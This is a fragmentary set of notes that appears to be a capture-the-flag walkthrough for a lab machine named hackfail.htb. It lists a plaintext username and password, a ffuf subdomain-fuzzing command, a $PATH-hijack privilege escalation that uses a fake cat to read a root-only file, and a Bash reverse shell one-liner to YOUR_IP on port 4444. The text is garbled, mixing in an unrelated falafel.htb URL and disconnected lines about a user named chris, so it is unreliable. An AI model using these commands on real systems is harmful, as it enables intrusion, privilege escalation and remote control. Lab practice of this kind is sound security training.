Username: failadmin Password: n3v3r_g0nn4_g1v3_y0u_up
Open, running OpenSSH. Useful for persistent access once credentials are recovered. hackfail.htb
http://falafel.htb/uploads/0820-2132_53b3ffcfc6f710c6/payload_name
ffuf -w /usr/share/wordlists/dirb/common.txt -H "Host: FUZZ.hackfail.htb" -u http://hackfail.htb -fs
hackfail.htb
The real fail is in /root/fail_log. You can't read it. But you notice fail_trap calls cat /root/fail_log without sanitizing $PATH. You export PATH=/tmp:$PATH, create a fake cat that copies /root/fail_log. Run fail_trap — bingo. The log contains the root password hash.
Execute a standard Bash reverse shell payload through the exploited web feature: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
If successful, this reveals a list of users on the system. Among them, you may find a user named chris.